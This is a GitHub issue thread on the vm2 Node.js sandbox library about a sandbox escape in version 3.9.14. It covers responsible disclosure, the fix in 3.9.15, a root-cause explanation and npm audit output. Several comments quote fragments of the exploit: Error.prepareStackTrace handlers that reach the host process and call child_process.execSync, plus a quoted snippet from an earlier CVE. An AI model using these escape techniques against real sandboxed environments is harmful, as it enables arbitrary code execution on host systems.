patriksimek / vm2

Advanced vm/sandbox for Node.js
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[VM2 Sandbox Escape] Vulnerability in vm2@3.9.14 #515

Closed seongil-wi closed 1 year ago

seongil-wi commented 1 year ago

Hello team, I am Seongil Wi from KAIST in South Korea.

Our research team in KAIST WSP Lab found a sandbox escape bug in vm2@3.9.14.

Since this is a confidential issue, we have sent an e-mail with PoC to the administrators below, so please check it.


XmiliaH commented 1 year ago

Thanks for the report.

seongil-wi commented 1 year ago

Hello @patriksimek ,

Could you please open a security advisory for this vulnerability?

patriksimek commented 1 year ago

@seongil-wi Just opened it. Thank you for reporting the issue. @XmiliaH Thank you for such a quick reaction and the patch.

XmiliaH commented 1 year ago

Fix in release 3.9.15. (See advisory

sickcodes commented 1 year ago

Nice one @XmiliaH!

Any feedback on the root cause?

Tried other arrangements of the PoC

Error.arguments = (e, frames) => {
    frames.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 
Error.caller = (e, frames) => {
    frames.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 
Error.prepareStackTrace = (e, frames) => {
    frames.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 

First two, produce ''caller', 'callee', and 'arguments' properties may not be accessed on strict mode functions or the arguments objects for calls to them'

Added some print breakpoints, 3.9.14:

hasAsync true
isAsync false
Error.prepareStackTrace = (e, frames) => {
    frames.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 
(async ()=>{}).constructor('return process')()

hasAsync true
isAsync true
code (async function anonymous(
) {
return process

Does it have anything to do with isAsync and hasAsync?

Then set BP on localArrayIsArray in setup-sandbox, shows:

Error.prepareStackTrace becomes:

(error, sst) => {
                if (localArrayIsArray(sst)) {
                    for (let i=0; i < sst.length; i++) {
                        const cs = sst[i];
                        if (typeof cs === 'object' && localReflectGetPrototypeOf(cs) === OriginalCallSite.prototype) {
                            sst[i] = new CallSite(cs);
                return value(error, sst);

Line 63 in the sandbox:

// global is originally prototype of host.Object so it can be used to climb up from the sandbox.
if (!localReflectSetPrototypeOf(context, localObject.prototype)) throw localUnexpected();

Is Error, below, missing configuration properties?

Object.defineProperties(global, {
    global: {value: global, writable: true, configurable: true, enumerable: true},
    globalThis: {value: global, writable: true, configurable: true},
    GLOBAL: {value: global, writable: true, configurable: true},
    root: {value: global, writable: true, configurable: true},
    Error: {value: LocalError}
    function thisFromOther(other) {
        // Note: other@other(unsafe) returns@this(unsafe) throws@this(unsafe)
        return thisFromOtherWithFactory(defaultFactory, other);

Or currentPrepareStackTrace?

sickcodes commented 1 year ago

I see

const EvalHandler = {
    __proto__: null,
    apply(target, thiz, args) {
        if (args.length === 0) return undefined;
        let code = `${args[0]}`;
        try {
            code = host.transformAndCheck(null, code, false, false, allowAsync);
        } catch (e) {
            throw bridge.from(e);
        return localEval(code);

Where, host.transformAndCheck(null, code, false, false, allowAsync);

So, isAsync is false, however, the code is:

async function aa(){

vm.js line 93,

function transformAndCheck(args, code, isAsync, isGenerator, allowAsync) {
    const ret = transformer(args, code, isAsync, isGenerator, undefined);
    checkAsync(allowAsync || !ret.hasAsync);
    return ret.code;

Produces: {code: '1=1', hasAsync: false}

Which is allegedly async?

XmiliaH commented 1 year ago

Any feedback on the root cause?

The root cause was that frames is a host array for newer node versions in case of unhandled async errors. Therefore, the frames array is now converted to a sandbox object when it is a host object.

First two, produce ''caller', 'callee', and 'arguments' properties may not be accessed on strict mode functions or the arguments objects for calls to them'

This is expected.

Does it have anything to do with isAsync and hasAsync?

It has noting to do with async. It only required an unhandled async exception.

So, isAsync is false, however, the code is:

async function aa(){

the eval is only there to throw a syntax error to trigger an unhandled async error in the aa function.

urbantom commented 1 year ago

Does npm audit command report this vulnerability?

XmiliaH commented 1 year ago

@urbantom Looking at it should, though I did not test it.

urbantom commented 1 year ago

Does anyone have a vulnerable environment to test the npm audit verification approach? I'll be able to bring my results in the next few days.

XmiliaH commented 1 year ago

@urbantom I just checked. You will get:

npm audit
# npm audit report

vm2  <3.9.15
Severity: critical
vm2 vulnerable to sandbox escape -
fix available via `npm audit fix`

1 critical severity vulnerability

To address all issues, run:
  npm audit fix
blindhacker99 commented 1 year ago

Hi @XmiliaH, I am just curious about how the fix had been done for the pretty same exploit method reported by Oxeye team here - ??

In oxeye team's report also the method for escaping the sandbox was typically same where attacker is using the prepareStackTrace() method to customise the CallStack() with escaping context scenario . I am mentioning the part of exploit here:

`globalThis.Error.prepareStackTrace = function(err, traces) { traces[0].getThis().process.mainModule.require('child_process')

// Here the author is exploiting the fact that CallSite array of stack frames is not sandboxed. Though the author is using one of the method here is getThis(). }`

As you have explained above that time itself we could have fix the in the same way right?

XmiliaH commented 1 year ago

CVE-2022-36067 was different. It used the fact that node does not call the prepareStackTrace on the Error object but on the object reachable by globalThis.Error. In the normal case these two objects are the same but in the mentiond case they changed the Error object and got around the wrapping of the prepareStackTrace function done on the Error object. This exploit used the fact that in some cases the array passed to the prepareStackTrace is a host object which was not expected and therefore passed as is into the sandbox.